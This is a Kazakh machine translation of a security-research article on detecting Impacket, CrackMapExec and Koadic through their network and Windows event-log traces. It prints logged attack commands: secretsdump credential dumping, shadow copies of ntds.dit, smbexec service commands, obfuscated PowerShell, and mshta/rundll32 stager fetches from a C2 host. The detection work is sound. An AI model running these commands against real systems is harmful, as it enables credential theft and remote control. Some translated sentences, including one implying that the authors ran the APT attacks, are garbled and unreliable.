Корпоративтік сектордағы шабуылдар саны жыл сайын өсіп келеді: мысалы 2016 жылға қарағанда, ал 2018 жылдың аяғында – алдыңғы кезеңге қарағанда. Оның ішінде негізгі жұмыс құралы Windows операциялық жүйесі болып табылатындар. 2017-2018 жылдары APT Dragonfly, APT28, Еуропадағы, Солтүстік Америкадағы және Сауд Арабиясындағы үкіметтік және әскери ұйымдарға шабуылдар жасады. Бұл үшін біз үш құралды қолдандық - , и . Олардың бастапқы коды ашық және GitHub сайтында қолжетімді.
Айта кету керек, бұл құралдар бастапқы ену үшін емес, инфрақұрылым ішіндегі шабуылды дамыту үшін қолданылады. Шабуылшылар оларды периметрге енгеннен кейін шабуылдың әртүрлі кезеңдерінде пайдаланады. Айтпақшы, бұл анықтау қиын және көбінесе технологияның көмегімен ғана немесе мүмкіндік беретін құралдар . Құралдар файлдарды тасымалдаудан бастап тізіліммен әрекеттесу және қашықтағы компьютерде пәрмендерді орындауға дейінгі әртүрлі функцияларды қамтамасыз етеді. Біз бұл құралдардың желілік белсенділігін анықтау үшін зерттеу жүргіздік.
Бізге не істеу керек болды:
- Бұзушылық құралдарының қалай жұмыс істейтінін түсініңіз. Шабуылдаушыларға не қажет екенін және олар қандай технологияларды пайдалана алатынын біліңіз.
- Шабуылдың алғашқы кезеңдерінде ақпаратты қорғау құралдары анықтамайтын нәрсені табыңыз. Барлау кезеңін өткізіп жіберуге болады, себебі шабуылдаушы ішкі шабуылдаушы болып табылады немесе шабуылдаушы инфрақұрылымдағы бұрын белгілі емес тесікті пайдаланып жатыр. Оның әрекеттерінің бүкіл тізбегін қалпына келтіруге болады, демек, одан әрі қозғалысты анықтауға деген ұмтылыс.
- Интрузияны анықтау құралдарынан жалған позитивтерді жойыңыз. Тек барлау негізінде белгілі бір әрекеттер анықталғанда, жиі қателер болуы мүмкін екенін ұмытпауымыз керек. Әдетте инфрақұрылымда кез келген ақпаратты алудың бір қарағанда заңдыдан ажыратылмайтын көптеген жолдары бар.
Бұл құралдар шабуылдаушыларға не береді? Егер бұл Impacket болса, онда шабуылдаушылар периметрді бұзғаннан кейін шабуылдың әртүрлі кезеңдерінде пайдалануға болатын модульдердің үлкен кітапханасын алады. Көптеген құралдар Impacket модульдерін ішкі пайдаланады - мысалы, Metasploit. Оның қашықтан пәрменді орындауға арналған dcomexec және wmiexec, Impacket қолданбасынан қосылған жадтан тіркелгілерді алуға арналған secretsdump бар. Нәтижесінде мұндай кітапхананың қызметін дұрыс анықтау туындыларды анықтауды қамтамасыз етеді.
Жасаушылар CrackMapExec (немесе жай ғана CME) туралы «Powered by Impacket» деп жазғаны кездейсоқ емес. Сонымен қатар, CME танымал сценарийлер үшін дайын функционалдылыққа ие: құпия сөздерді немесе олардың хэштерін алуға арналған Mimikatz, қашықтан орындау үшін Meterpreter немесе Empire агентін іске асыру және борттағы Bloodhound.
Біз таңдаған үшінші құрал Koadic болды. Бұл өте жақында болды, ол 25 жылы DEFCON 2017 халықаралық хакерлер конференциясында ұсынылды және стандартты емес тәсілімен ерекшеленеді: ол HTTP, Java Script және Microsoft Visual Basic Script (VBS) арқылы жұмыс істейді. Бұл тәсіл жердің сыртында өмір сүру деп аталады: құрал Windows жүйесіне енгізілген тәуелділіктер мен кітапханалар жинағын пайдаланады. Жасаушылар оны COM Command & Control немесе C3 деп атайды.
ИМПАКЕТ
Impacket функциясы өте кең, AD ішіндегі барлау және ішкі MS SQL серверлерінен деректерді жинау, тіркелгі деректерін алу әдістеріне дейін: бұл SMB релелік шабуылы және домен контроллерінен пайдаланушы құпия сөздерінің хэштерін қамтитын ntds.dit файлын алу. Impacket сонымен қатар төрт түрлі әдісті пайдаланып пәрмендерді қашықтан орындайды: WMI, Windows Scheduler Management Service, DCOM және SMB және ол үшін тіркелгі деректерін талап етеді.
Құпия қоқыс
Құпиялар қоқысын қарастырайық. Бұл пайдаланушы машиналарын да, домен контроллерлерін де бағыттай алатын модуль. Оны LSA, SAM, SECURITY, NTDS.dit жады аймақтарының көшірмелерін алу үшін пайдалануға болады, сондықтан оны шабуылдың әртүрлі кезеңдерінде көруге болады. Модуль жұмысының бірінші қадамы SMB арқылы аутентификация болып табылады, ол Pass the Hash шабуылын автоматты түрде орындау үшін пайдаланушының құпия сөзін немесе оның хэшін талап етеді. Келесі кезекте Қызметті басқару менеджеріне (SCM) кіру рұқсатын ашу және тізілімге winreg протоколы арқылы қол жеткізу туралы сұрау келеді, оның көмегімен шабуылдаушы қызығушылық танытатын филиалдардың деректерін біліп, SMB арқылы нәтижелер ала алады.
Суретте. 1-суретте біз winreg протоколын пайдаланған кезде LSA бар тізілім кілті арқылы кіруге қалай қол жеткізілетінін көреміз. Ол үшін 15 операция коды бар DCERPC пәрменін пайдаланыңыз - OpenKey.
Күріш. 1. Winreg протоколы арқылы тізілім кілтін ашу
Әрі қарай, кілтке қол жеткізген кезде мәндер 20 операция коды бар SaveKey пәрменімен сақталады. Impacket мұны өте нақты түрде жасайды. Ол мәндерді аты .tmp арқылы қосылған 8 кездейсоқ таңбадан тұратын жол болып табылатын файлға сақтайды. Сонымен қатар, бұл файлды одан әрі жүктеу System32 каталогынан SMB арқылы жүзеге асырылады (2-сурет).
Күріш. 2. Қашықтағы машинадан тізілім кілтін алу схемасы
Желідегі мұндай белсенділікті winreg протоколын, нақты атауларды, пәрмендерді және олардың тәртібін пайдаланып белгілі бір тізілім филиалдарына сұрау арқылы анықтауға болады.
Бұл модуль сонымен қатар Windows оқиғалар журналында іздер қалдырады, бұл анықтауды жеңілдетеді. Мысалы, команданы орындау нәтижесінде
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCWindows Server 2016 журналында оқиғалардың келесі негізгі тізбегін көреміз:
1. 4624 - қашықтан кіру.
2. 5145 - winreg қашықтағы қызметіне кіру құқықтарын тексеру.
3. 5145 - System32 каталогындағы файлдарға қол жеткізу құқықтарын тексеру. Файлдың жоғарыда аталған кездейсоқ атауы бар.
4. 4688 - vssadmin іске қосатын cmd.exe процесін жасау:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - пәрменмен процесті құру:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - пәрменмен процесті құру:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - пәрменмен процесті құру:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Пайдаланудан кейінгі көптеген құралдар сияқты, Impacket-те командаларды қашықтан орындауға арналған модульдер бар. Біз қашықтағы компьютерде интерактивті пәрмен қабығын қамтамасыз ететін smbexec-ке назар аударамыз. Бұл модуль сонымен қатар құпия сөз немесе құпия сөз хэшімен SMB арқылы аутентификацияны қажет етеді. Суретте. 3-суретте біз мұндай құралдың қалай жұмыс істейтінінің мысалын көреміз, бұл жағдайда бұл жергілікті әкімші консолі.
Күріш. 3. Интерактивті smbexec консолі
Аутентификациядан кейін smbexec бағдарламасының бірінші қадамы OpenSCManagerW пәрменімен SCM ашу болып табылады (15). Сұрау назар аударарлық: MachineName өрісі DUMMY.
Күріш. 4. Қызметті басқару менеджерін ашуды сұрау
Әрі қарай, қызмет CreateServiceW пәрмені арқылы жасалады (12). Smbexec жағдайында біз әр уақытта бірдей команда құру логикасын көре аламыз. Суретте. 5 жасыл өзгермейтін пәрмен параметрлерін, сары - шабуылдаушы нені өзгерте алатынын көрсетеді. Орындалатын файлдың атын, оның каталогын және шығыс файлын өзгертуге болатынын көру оңай, бірақ қалғанын Impacket модулінің логикасын бұзбай өзгерту әлдеқайда қиын.
Күріш. 5. Service Control Manager көмегімен қызметті жасауды сұрау
Smbexec сонымен қатар Windows оқиғалар журналында айқын іздер қалдырады. ipconfig пәрмені бар интерактивті пәрмен қабығына арналған Windows Server 2016 журналында біз оқиғалардың келесі негізгі тізбегін көреміз:
1. 4697 — жәбірленушінің аппаратында қызметті орнату:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - 1 тармақтың аргументтерімен cmd.exe процесін құру.
3. 5145 - C$ каталогындағы __output файлына қатынасу құқықтарын тексеру.
4. 4697 — жәбірленушінің аппаратында қызметті орнату.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - 4 тармақтың аргументтерімен cmd.exe процесін құру.
6. 5145 - C$ каталогындағы __output файлына қатынасу құқықтарын тексеру.
Импакет шабуыл құралдарын әзірлеу үшін негіз болып табылады. Ол Windows инфрақұрылымындағы барлық дерлік протоколдарды қолдайды және сонымен бірге өзіне тән ерекшеліктері бар. Мұнда арнайы winreg сұраулары және команда құруға тән SCM API пайдалану, файл атауы пішімі және SMB ортақ SYSTEM32.
CRACKMAPEXEC
CME құралы негізінен шабуылдаушы желі ішінде ілгерілеу үшін орындауы керек әдеттегі әрекеттерді автоматтандыруға арналған. Ол әйгілі Empire агентімен және Meterpreter-пен бірге жұмыс істеуге мүмкіндік береді. Командаларды жасырын орындау үшін CME оларды жасыра алады. Bloodhound (бөлек барлау құралы) көмегімен шабуылдаушы белсенді домен әкімшісі сеансын іздеуді автоматтандыруы мүмкін.
ищейка
Bloodhound дербес құрал ретінде желі ішінде кеңейтілген барлауды жүргізуге мүмкіндік береді. Ол пайдаланушылар, машиналар, топтар, сеанстар туралы деректерді жинайды және PowerShell сценарийі немесе екілік файл ретінде жеткізіледі. LDAP немесе SMB негізіндегі протоколдар ақпаратты жинау үшін пайдаланылады. CME интеграциялық модулі Bloodhound-ты жәбірленушінің машинасына жүктеп алуға, іске қосқаннан кейін жиналған деректерді іске қосуға және алуға мүмкіндік береді, осылайша жүйедегі әрекеттерді автоматтандырады және оларды азырақ байқалмайды. Bloodhound графикалық қабығы жиналған деректерді графиктер түрінде ұсынады, бұл шабуылдаушы машинасынан домен әкімшісіне дейінгі ең қысқа жолды табуға мүмкіндік береді.
Күріш. 6. Bloodhound интерфейсі
Жәбірленушінің машинасында іске қосу үшін модуль ATSVC және SMB көмегімен тапсырма жасайды. ATSVC — Windows тапсырмаларын жоспарлаушымен жұмыс істеуге арналған интерфейс. CME желі арқылы тапсырмалар жасау үшін NetrJobAdd(1) функциясын пайдаланады. CME модулі нені жіберетінінің мысалы суретте көрсетілген. 7: Бұл cmd.exe пәрмен шақыруы және XML пішіміндегі аргументтер түріндегі түсініксіз код.
7-сурет. CME арқылы тапсырма жасау
Тапсырма орындауға жіберілгеннен кейін, жәбірленушінің машинасы Bloodhound-ты өзі іске қосады және мұны трафиктен көруге болады. Модуль стандартты топтарды, домендегі барлық машиналар мен пайдаланушылардың тізімін алу және SRVSVC NetSessEnum сұрауы арқылы белсенді пайдаланушы сеанстары туралы ақпаратты алу үшін LDAP сұрауларымен сипатталады.
Күріш. 8. SMB арқылы белсенді сеанстар тізімін алу
Бұған қоса, Bloodhound-ты жәбірленушінің машинасында тексеру қосылғанда іске қосу ID 4688 (процесс жасау) және процесс атауы бар оқиғамен бірге жүреді. «C:WindowsSystem32cmd.exe». Бұл туралы маңызды нәрсе пәрмен жолы дәлелдері:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
enum_avproducts модулі функционалдық және іске асыру тұрғысынан өте қызықты. WMI әртүрлі Windows нысандарынан деректерді алу үшін WQL сұрау тілін пайдалануға мүмкіндік береді, бұл негізінен осы CME модулі қолданатын нәрсе. Ол AntiSpywareProduct және AntiMirusProduct сыныптарына жәбірленушінің құрылғысында орнатылған қорғаныс құралдары туралы сұрауларды жасайды. Қажетті деректерді алу үшін модуль rootSecurityCenter2 аттар кеңістігіне қосылады, содан кейін WQL сұрауын жасайды және жауап алады. Суретте. 9-суретте осындай сұраулар мен жауаптардың мазмұны көрсетілген. Біздің мысалда Windows Defender табылды.
Күріш. 9. enum_avproducts модулінің желілік әрекеті
Көбінесе оқиғаларында WQL сұраулары туралы пайдалы ақпаратты таба алатын WMI аудиті (WMI-Activity Trace) өшірілуі мүмкін. Бірақ егер ол қосылған болса, онда enum_avproducts сценарийі іске қосылса, идентификаторы 11 оқиға сақталады.Онда сұрауды жіберген пайдаланушының аты және rootSecurityCenter2 аттар кеңістігіндегі атау болады.
CME модульдерінің әрқайсысының өз артефактілері болды, мейлі ол арнайы WQL сұраулары болсын немесе LDAP және SMB жүйесіндегі түсініксіздігі және Bloodhound-ке тән әрекеті бар тапсырмаларды жоспарлаушыда белгілі бір тапсырма түрін жасау болсын.
КОАДИК
Koadic бағдарламасының айрықша ерекшелігі Windows жүйесіне енгізілген JavaScript және VBScript аудармашыларын пайдалану болып табылады. Бұл мағынада ол жер бетіндегі тенденцияға сәйкес өмір сүреді - яғни оның сыртқы тәуелділігі жоқ және стандартты Windows құралдарын пайдаланады. Бұл толық Command & Control (CnC) құралы, өйткені инфекциядан кейін құрылғыға «имплант» орнатылып, оны басқаруға мүмкіндік береді. Мұндай машина коадтық терминологияда «зомби» деп аталады. Егер жәбірленушінің толық жұмыс істеуі үшін артықшылықтар жеткіліксіз болса, Koadic пайдаланушы тіркелгісін басқаруды айналып өту (UAC айналып өту) әдістерін қолдана отырып, оларды көтеру мүмкіндігіне ие.
Күріш. 10. Koadic Shell
Жәбірленуші Command & Control серверімен байланысты бастауы керек. Мұны істеу үшін ол бұрын дайындалған URI-ге хабарласып, стажерлердің бірін пайдаланып негізгі Koadic денесін алуы керек. Суретте. 11-суретте мшта стадеріне мысал келтірілген.
Күріш. 11. CnC серверімен сеансты инициализациялау
Жауап айнымалысы WS негізінде орындалу WScript.Shell арқылы жүзеге асатыны және STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE айнымалылары ағымдағы сеанс параметрлері туралы негізгі ақпаратты қамтитыны анық болады. Бұл CnC серверімен HTTP қосылымындағы бірінші сұрау-жауап жұбы. Кейінгі сұраныстар шақырылатын модульдердің (импланттардың) функционалдығымен тікелей байланысты. Барлық Koadic модульдері тек CnC көмегімен белсенді сеанспен жұмыс істейді.
Mimikatz
CME Bloodhound-пен жұмыс істегені сияқты, Koadic де Mimikatz-пен бөлек бағдарлама ретінде жұмыс істейді және оны іске қосудың бірнеше жолы бар. Төменде Mimikatz имплантын жүктеп алуға арналған сұрау-жауап жұбы берілген.
Күріш. 12. Мимикатцты Коадичке ауыстырыңыз
Сұраудағы URI пішімі қалай өзгергенін көре аласыз. Ол енді таңдалған модуль үшін жауап беретін csrf айнымалысының мәнін қамтиды. Оның атына назар аудармаңыз; CSRF әдетте басқаша түсінілетінін бәріміз білеміз. Жауап Коадичтің дәл сол негізгі бөлігі болды, оған Мимикатцқа қатысты код қосылды. Бұл өте үлкен, сондықтан негізгі сәттерді қарастырайық. Мұнда бізде base64-те кодталған Mimikatz кітапханасы, оны енгізетін серияланған .NET сыныбы және Mimikatz іске қосу үшін дәлелдер бар. Орындау нәтижесі желі арқылы анық мәтін түрінде беріледі.
Күріш. 13. Мимикатцты қашықтағы машинада іске қосу нәтижесі
Exec_cmd
Koadic-те командаларды қашықтан орындай алатын модульдер де бар. Мұнда біз бірдей URI генерациялау әдісін және таныс sid және csrf айнымалыларын көреміз. exec_cmd модулі жағдайында қабық пәрмендерін орындауға қабілетті денеге код қосылады. Төменде CnC серверінің HTTP жауапында қамтылған осындай код көрсетілген.
Күріш. 14. Имплант коды exec_cmd
Таныс WS атрибуты бар GAWTUUGCFI айнымалысы кодты орындау үшін қажет. Оның көмегімен имплант кодтың екі тармағын өңдейтін қабықты шақырады - шығыс деректер ағынының қайтарылуымен shell.exec және қайтарусыз shell.run.
Koadic әдеттегі құрал емес, бірақ оның заңды трафиктен табуға болатын өзіндік артефактілері бар:
- HTTP сұрауларының арнайы қалыптасуы,
- winHttpRequests API пайдалану,
- ActiveXObject арқылы WScript.Shell нысанын жасау,
- үлкен орындалатын дене.
Бастапқы қосылым стажер арқылы басталады, сондықтан оның әрекетін Windows оқиғалары арқылы анықтауға болады. Mshta үшін бұл бастау атрибуты бар процесті құруды көрсететін 4688 оқиғасы:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Koadic жұмыс істеп тұрған кезде, сіз оны тамаша сипаттайтын атрибуттары бар басқа 4688 оқиғаны көре аласыз:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1қорытындылар
Қылмыскерлер арасында жермен өмір сүру үрдісі танымал болуда. Олар өз қажеттіліктері үшін Windows жүйесіне енгізілген құралдар мен механизмдерді пайдаланады. Біз осы қағидаға сәйкес танымал Koadic, CrackMapExec және Impacket құралдарының APT есептерінде жиі кездесетінін көріп отырмыз. GitHub-та бұл құралдарға арналған шанышқылардың саны да артып келеді және жаңалары пайда болуда (қазір олардың мыңға жуығы бар). Тренд өзінің қарапайымдылығына байланысты танымал болуда: шабуылдаушыларға үшінші тарап құралдарының қажеті жоқ, олар қазірдің өзінде құрбандардың машиналарында және қауіпсіздік шараларын айналып өтуге көмектеседі. Біз желілік байланысты зерттеуге назар аударамыз: жоғарыда сипатталған әрбір құрал желілік трафикте өзіндік із қалдырады; оларды егжей-тегжейлі зерттеу өз өнімімізді үйретуге мүмкіндік берді оларды анықтау, сайып келгенде, олармен байланысты киберинциденттер тізбегін зерттеуге көмектеседі.
авторлар:
- Антон Тюрин, PT Expert Security Center, Positive Technologies сараптамалық қызметтер бөлімінің басшысы
- Егор Подмоков, PT Expert Security Center, Positive Technologies сарапшысы
Ақпарат көзі: www.habr.com